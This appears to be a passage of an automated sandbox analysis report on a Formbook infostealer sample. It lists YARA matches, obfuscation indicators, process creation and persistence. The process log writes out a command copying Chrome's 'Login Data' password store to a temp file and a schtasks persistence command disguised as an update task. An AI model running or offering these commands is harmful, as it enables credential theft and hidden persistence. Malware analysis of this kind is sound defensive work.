Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Code function: 6_2_0041E389 6_2_0041E389
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Code function: 6_2_0041DC0A 6_2_0041DC0A
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Code function: 6_2_0041DCE9 6_2_0041DCE9
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Code function: 6_2_00402D87 6_2_00402D87
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Code function: 6_2_0041DD8F 6_2_0041DD8F
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Code function: 6_2_00402D90 6_2_00402D90
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Code function: 6_2_00409E30 6_2_00409E30
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Code function: 6_2_0041E772 6_2_0041E772
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Code function: 6_2_00402FB0 6_2_00402FB0
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Code function: 6_2_0140F900 6_2_0140F900
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Code function: 6_2_01424120 6_2_01424120
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Code function: 6_2_014C1002 6_2_014C1002
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Code function: 6_2_014D28EC 6_2_014D28EC
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Code function: 6_2_0141B090 6_2_0141B090
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Code function: 6_2_014320A0 6_2_014320A0
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Code function: 6_2_014D20A8 6_2_014D20A8
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Code function: 6_2_014D2B28 6_2_014D2B28
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Code function: 6_2_014CDBD2 6_2_014CDBD2
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Code function: 6_2_0143EBB0 6_2_0143EBB0
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Code function: 6_2_014D22AE 6_2_014D22AE
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Code function: 6_2_014D1D55 6_2_014D1D55
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Code function: 6_2_014D2D07 6_2_014D2D07
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Code function: 6_2_01400D20 6_2_01400D20
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Code function: 6_2_014D25DD 6_2_014D25DD
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Code function: 6_2_0141D5E0 6_2_0141D5E0
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Code function: 6_2_01432581 6_2_01432581
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Code function: 6_2_014CD466 6_2_014CD466
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Code function: 6_2_0141841F 6_2_0141841F
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Code function: 6_2_014D1FF1 6_2_014D1FF1
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Code function: 6_2_014CD616 6_2_014CD616
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Code function: 6_2_01426E30 6_2_01426E30
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Code function: 6_2_014D2EF7 6_2_014D2EF7
Source: C:\Windows\SysWOW64\systray.exe Code function: 13_2_0474D466 13_2_0474D466
Source: C:\Windows\SysWOW64\systray.exe Code function: 13_2_0469841F 13_2_0469841F
Source: C:\Windows\SysWOW64\systray.exe Code function: 13_2_04751D55 13_2_04751D55
Source: C:\Windows\SysWOW64\systray.exe Code function: 13_2_04680D20 13_2_04680D20
Source: C:\Windows\SysWOW64\systray.exe Code function: 13_2_04752D07 13_2_04752D07
Source: C:\Windows\SysWOW64\systray.exe Code function: 13_2_0469D5E0 13_2_0469D5E0
Source: C:\Windows\SysWOW64\systray.exe Code function: 13_2_047525DD 13_2_047525DD
Source: C:\Windows\SysWOW64\systray.exe Code function: 13_2_046B2581 13_2_046B2581
Source: C:\Windows\SysWOW64\systray.exe Code function: 13_2_046A6E30 13_2_046A6E30
Source: C:\Windows\SysWOW64\systray.exe Code function: 13_2_0474D616 13_2_0474D616
Source: C:\Windows\SysWOW64\systray.exe Code function: 13_2_04752EF7 13_2_04752EF7
Source: C:\Windows\SysWOW64\systray.exe Code function: 13_2_04751FF1 13_2_04751FF1
Source: C:\Windows\SysWOW64\systray.exe Code function: 13_2_0475E824 13_2_0475E824
Source: C:\Windows\SysWOW64\systray.exe Code function: 13_2_04741002 13_2_04741002
Source: C:\Windows\SysWOW64\systray.exe Code function: 13_2_047528EC 13_2_047528EC
Source: C:\Windows\SysWOW64\systray.exe Code function: 13_2_046B20A0 13_2_046B20A0
Source: C:\Windows\SysWOW64\systray.exe Code function: 13_2_047520A8 13_2_047520A8
Source: C:\Windows\SysWOW64\systray.exe Code function: 13_2_0469B090 13_2_0469B090
Source: C:\Windows\SysWOW64\systray.exe Code function: 13_2_046A4120 13_2_046A4120
Source: C:\Windows\SysWOW64\systray.exe Code function: 13_2_0468F900 13_2_0468F900
Source: C:\Windows\SysWOW64\systray.exe Code function: 13_2_047522AE 13_2_047522AE
Source: C:\Windows\SysWOW64\systray.exe Code function: 13_2_04752B28 13_2_04752B28
Source: C:\Windows\SysWOW64\systray.exe Code function: 13_2_0474DBD2 13_2_0474DBD2
Source: C:\Windows\SysWOW64\systray.exe Code function: 13_2_046BEBB0 13_2_046BEBB0
Source: C:\Windows\SysWOW64\systray.exe Code function: 13_2_006FD169 13_2_006FD169
Source: C:\Windows\SysWOW64\systray.exe Code function: 13_2_006FD176 13_2_006FD176
Source: C:\Windows\SysWOW64\systray.exe Code function: 13_2_006FD258 13_2_006FD258
Source: C:\Windows\SysWOW64\systray.exe Code function: 13_2_006FD3FA 13_2_006FD3FA
Source: C:\Windows\SysWOW64\systray.exe Code function: 13_2_006FE389 13_2_006FE389
Source: C:\Windows\SysWOW64\systray.exe Code function: 13_2_006E2D87 13_2_006E2D87
Source: C:\Windows\SysWOW64\systray.exe Code function: 13_2_006E2D90 13_2_006E2D90
Source: C:\Windows\SysWOW64\systray.exe Code function: 13_2_006E9E30 13_2_006E9E30
Source: C:\Windows\SysWOW64\systray.exe Code function: 13_2_006FE772 13_2_006FE772
Source: C:\Windows\SysWOW64\systray.exe Code function: 13_2_006E2FB0 13_2_006E2FB0
Found potential string decryption / allocating functions
Source: C:\Windows\SysWOW64\systray.exe Code function: String function: 0468B150 appears 35 times
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Code function: String function: 0140B150 appears 35 times
Sample file is different than original file name gathered from version info
Source: MOe7vYpWXW.exe Binary or memory string: OriginalFilename vs MOe7vYpWXW.exe
Source: MOe7vYpWXW.exe, 00000000.00000002.683105402.0000000003AD9000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameDSASignature.dll@ vs MOe7vYpWXW.exe
Source: MOe7vYpWXW.exe, 00000000.00000002.697214116.0000000008BE0000.00000002.00000001.sdmp Binary or memory string: OriginalFilenameIEFRAME.DLLD vs MOe7vYpWXW.exe
Source: MOe7vYpWXW.exe, 00000000.00000003.679856041.0000000008B05000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameFixupHolderList.exeB vs MOe7vYpWXW.exe
Source: MOe7vYpWXW.exe, 00000000.00000002.696137943.0000000007370000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameSimpleUI.dll( vs MOe7vYpWXW.exe
Source: MOe7vYpWXW.exe, 00000000.00000002.696716283.0000000007740000.00000002.00000001.sdmp Binary or memory string: originalfilename vs MOe7vYpWXW.exe
Source: MOe7vYpWXW.exe, 00000000.00000002.696716283.0000000007740000.00000002.00000001.sdmp Binary or memory string: OriginalFilenamepropsys.dll.mui@ vs MOe7vYpWXW.exe
Source: MOe7vYpWXW.exe, 00000000.00000002.697493001.000000000E8B0000.00000002.00000001.sdmp Binary or memory string: System.OriginalFileName vs MOe7vYpWXW.exe
Source: MOe7vYpWXW.exe, 00000000.00000002.695799613.0000000007290000.00000002.00000001.sdmp Binary or memory string: OriginalFilenamemscorrc.dllT vs MOe7vYpWXW.exe
Source: MOe7vYpWXW.exe Binary or memory string: OriginalFilename vs MOe7vYpWXW.exe
Source: MOe7vYpWXW.exe, 00000005.00000002.678354207.0000000000102000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameFixupHolderList.exeB vs MOe7vYpWXW.exe
Source: MOe7vYpWXW.exe Binary or memory string: OriginalFilename vs MOe7vYpWXW.exe
Source: MOe7vYpWXW.exe, 00000006.00000002.734301689.000000000168F000.00000040.00000001.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs MOe7vYpWXW.exe
Source: MOe7vYpWXW.exe, 00000006.00000002.733899042.000000000114A000.00000004.00000020.sdmp Binary or memory string: OriginalFilenamesystray.exej% vs MOe7vYpWXW.exe
Source: MOe7vYpWXW.exe, 00000006.00000002.727252198.0000000000992000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameFixupHolderList.exeB vs MOe7vYpWXW.exe
Source: MOe7vYpWXW.exe Binary or memory string: OriginalFilenameFixupHolderList.exeB vs MOe7vYpWXW.exe
Uses 32bit PE files
Source: MOe7vYpWXW.exe Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Yara signature match
Source: 00000000.00000002.683105402.0000000003AD9000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000002.683105402.0000000003AD9000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000006.00000002.733752861.00000000010D0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000006.00000002.733752861.00000000010D0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000D.00000002.919281681.0000000000E00000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000D.00000002.919281681.0000000000E00000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000D.00000002.918719322.00000000006E0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000D.00000002.918719322.00000000006E0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000006.00000002.733501638.00000000010A0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000006.00000002.733501638.00000000010A0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000006.00000002.727145278.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000006.00000002.727145278.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000D.00000002.919250262.0000000000DD0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000D.00000002.919250262.0000000000DD0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 6.2.MOe7vYpWXW.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 6.2.MOe7vYpWXW.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 6.2.MOe7vYpWXW.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 6.2.MOe7vYpWXW.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: MOe7vYpWXW.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: fendlKCsOIoiN.exe.0.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@13/9@6/2
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe File created: C:\Users\user\AppData\Roaming\fendlKCsOIoiN.exe Jump to behavior
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6840:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7140:120:WilError_01
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe File created: C:\Users\user\AppData\Local\Temp\tmpC79C.tmp Jump to behavior
Source: MOe7vYpWXW.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll Jump to behavior
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe File read: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: MOe7vYpWXW.exe, 00000000.00000002.681851207.0000000002B4C000.00000004.00000001.sdmp Binary or memory string: Select * from Clientes WHERE id=@id;;
Source: MOe7vYpWXW.exe, 00000000.00000002.681851207.0000000002B4C000.00000004.00000001.sdmp Binary or memory string: Select * from Aluguel Erro ao listar Banco sql-Aluguel.INSERT INTO Aluguel VALUES(@clienteID, @data);
Source: MOe7vYpWXW.exe, 00000000.00000002.681851207.0000000002B4C000.00000004.00000001.sdmp Binary or memory string: Select * from SecurityLogonType WHERE id=@id;
Source: MOe7vYpWXW.exe, 00000000.00000002.681851207.0000000002B4C000.00000004.00000001.sdmp Binary or memory string: Select * from SecurityLogonType WHERE modelo=@modelo;
Source: MOe7vYpWXW.exe, 00000000.00000002.681851207.0000000002B4C000.00000004.00000001.sdmp Binary or memory string: INSERT INTO Itens_Aluguel VALUES(@aluguelID, @aviaoID, @validade);
Source: MOe7vYpWXW.exe, 00000000.00000002.681851207.0000000002B4C000.00000004.00000001.sdmp Binary or memory string: Insert into Clientes values (@nome, @cpf, @rg, @cidade, @endereco, @uf, @telefone);
Source: MOe7vYpWXW.exe, 00000000.00000002.681851207.0000000002B4C000.00000004.00000001.sdmp Binary or memory string: INSERT INTO Aluguel VALUES(@clienteID, @data);
Source: MOe7vYpWXW.exe, 00000000.00000002.681851207.0000000002B4C000.00000004.00000001.sdmp Binary or memory string: INSERT INTO SecurityLogonType VALUES(@modelo, @fabricante, @ano, @cor);
Source: MOe7vYpWXW.exe, 00000000.00000002.681851207.0000000002B4C000.00000004.00000001.sdmp Binary or memory string: Select * from SecurityLogonType*Erro ao listar Banco sql-SecurityLogonType,Select * from SecurityLogonType WHERE id=@id;Select * from SecurityLogonType WHERE (modelo LIKE @modelo)
Source: MOe7vYpWXW.exe Virustotal: Detection: 21%
Source: MOe7vYpWXW.exe ReversingLabs: Detection: 27%
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe File read: C:\Users\user\Desktop\MOe7vYpWXW.exe Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\MOe7vYpWXW.exe 'C:\Users\user\Desktop\MOe7vYpWXW.exe'
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\fendlKCsOIoiN' /XML 'C:\Users\user\AppData\Local\Temp\tmpC79C.tmp'
Source: C:\Windows\SysWOW64\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Process created: C:\Users\user\Desktop\MOe7vYpWXW.exe C:\Users\user\Desktop\MOe7vYpWXW.exe
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Process created: C:\Users\user\Desktop\MOe7vYpWXW.exe C:\Users\user\Desktop\MOe7vYpWXW.exe
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\autochk.exe C:\Windows\SysWOW64\autochk.exe
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\systray.exe C:\Windows\SysWOW64\systray.exe
Source: C:\Windows\SysWOW64\systray.exe Process created: C:\Windows\SysWOW64\cmd.exe /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user\AppData\Local\Temp\DB1' /V
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\fendlKCsOIoiN' /XML 'C:\Users\user\AppData\Local\Temp\tmpC79C.tmp' Jump to behavior
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Process created: C:\Users\user\Desktop\MOe7vYpWXW.exe C:\Users\user\Desktop\MOe7vYpWXW.exe Jump to behavior
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Process created: C:\Users\user\Desktop\MOe7vYpWXW.exe C:\Users\user\Desktop\MOe7vYpWXW.exe Jump to behavior
Source: C:\Windows\SysWOW64\systray.exe Process created: C:\Windows\SysWOW64\cmd.exe /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user\AppData\Local\Temp\DB1' /V Jump to behavior
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{8856F961-340A-11D0-A96B-00C04FD705A2}\InProcServer32 Jump to behavior
Source: C:\Windows\SysWOW64\systray.exe File written: C:\Users\user\AppData\Roaming\2N30OA8F\2N3logri.ini Jump to behavior
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll Jump to behavior
Source: C:\Windows\SysWOW64\systray.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\ Jump to behavior
Source: MOe7vYpWXW.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: MOe7vYpWXW.exe Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: systray.pdb source: MOe7vYpWXW.exe, 00000006.00000002.733899042.000000000114A000.00000004.00000020.sdmp
Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000007.00000002.930881315.0000000005A00000.00000002.00000001.sdmp
Source: Binary string: systray.pdbGCTL source: MOe7vYpWXW.exe, 00000006.00000002.733899042.000000000114A000.00000004.00000020.sdmp
Source: Binary string: wntdll.pdbUGP source: MOe7vYpWXW.exe, 00000006.00000002.733964378.00000000013E0000.00000040.00000001.sdmp, systray.exe, 0000000D.00000003.727048193.0000000000E80000.00000004.00000001.sdmp
Source: Binary string: wntdll.pdb source: MOe7vYpWXW.exe, systray.exe
Source: Binary string: wscui.pdb source: explorer.exe, 00000007.00000002.930881315.0000000005A00000.00000002.00000001.sdmp

Data Obfuscation:

barindex
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Code function: 0_2_0065B220 push es; retf 0_2_0065B4AB
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Code function: 0_2_0065B4AE push es; retf 0_2_0065B4AB
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Code function: 0_2_0065B047 push es; retf 0_2_0065B4AB
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Code function: 0_2_050DCF58 push eax; retf 0_2_050DCF61
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Code function: 5_2_0010B047 push es; retf 5_2_0010B4AB
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Code function: 5_2_0010B220 push es; retf 5_2_0010B4AB
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Code function: 5_2_0010B4AE push es; retf 5_2_0010B4AB
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Code function: 6_2_0041D0D2 push eax; ret 6_2_0041D0D8
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Code function: 6_2_0041D0DB push eax; ret 6_2_0041D142
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Code function: 6_2_0041D085 push eax; ret 6_2_0041D0D8
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Code function: 6_2_004178AC push ebp; ret 6_2_004178B3
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Code function: 6_2_0041E152 pushad ; iretd 6_2_0041E154
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Code function: 6_2_00417160 pushfd ; ret 6_2_00417162
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Code function: 6_2_0041E160 push ebp; ret 6_2_0041E161
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Code function: 6_2_0041D13C push eax; ret 6_2_0041D142
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Code function: 6_2_00417A49 push edi; retf 6_2_00417A4A
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Code function: 6_2_00406AE3 push esp; retf 6_2_00406AEF
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Code function: 6_2_00417B94 push ecx; iretd 6_2_00417B9A
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Code function: 6_2_00401408 pushad ; retf 6_2_0040140E
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Code function: 6_2_0099B047 push es; retf 6_2_0099B4AB
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Code function: 6_2_0099B220 push es; retf 6_2_0099B4AB
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Code function: 6_2_0099B4AE push es; retf 6_2_0099B4AB
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Code function: 6_2_0145D0D1 push ecx; ret 6_2_0145D0E4
Source: C:\Windows\SysWOW64\systray.exe Code function: 13_2_046DD0D1 push ecx; ret 13_2_046DD0E4
Source: C:\Windows\SysWOW64\systray.exe Code function: 13_2_006FD0DB push eax; ret 13_2_006FD142
Source: C:\Windows\SysWOW64\systray.exe Code function: 13_2_006FD0D2 push eax; ret 13_2_006FD0D8
Source: C:\Windows\SysWOW64\systray.exe Code function: 13_2_006F78AC push ebp; ret 13_2_006F78B3
Source: C:\Windows\SysWOW64\systray.exe Code function: 13_2_006FD085 push eax; ret 13_2_006FD0D8
Source: C:\Windows\SysWOW64\systray.exe Code function: 13_2_006F7160 pushfd ; ret 13_2_006F7162
Source: C:\Windows\SysWOW64\systray.exe Code function: 13_2_006FE160 push ebp; ret 13_2_006FE161
Source: C:\Windows\SysWOW64\systray.exe Code function: 13_2_006FE152 pushad ; iretd 13_2_006FE154
Source: initial sample Static PE information: section name: .text entropy: 7.671926204
Source: initial sample Static PE information: section name: .text entropy: 7.671926204

Persistence and Installation Behavior:

barindex
Drops PE files
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe File created: C:\Users\user\AppData\Roaming\fendlKCsOIoiN.exe Jump to dropped file

Boot Survival:

barindex
Uses schtasks.exe or at.exe to add and modify task schedules
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\fendlKCsOIoiN' /XML 'C:\Users\user\AppData\Local\Temp\tmpC79C.tmp'

Hooking and other Techniques for Hiding and Protection:

barindex
Modifies the prolog of user mode functions (user mode inline hooks)
Source: explorer.exe User mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x80 0x0E 0xEC
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
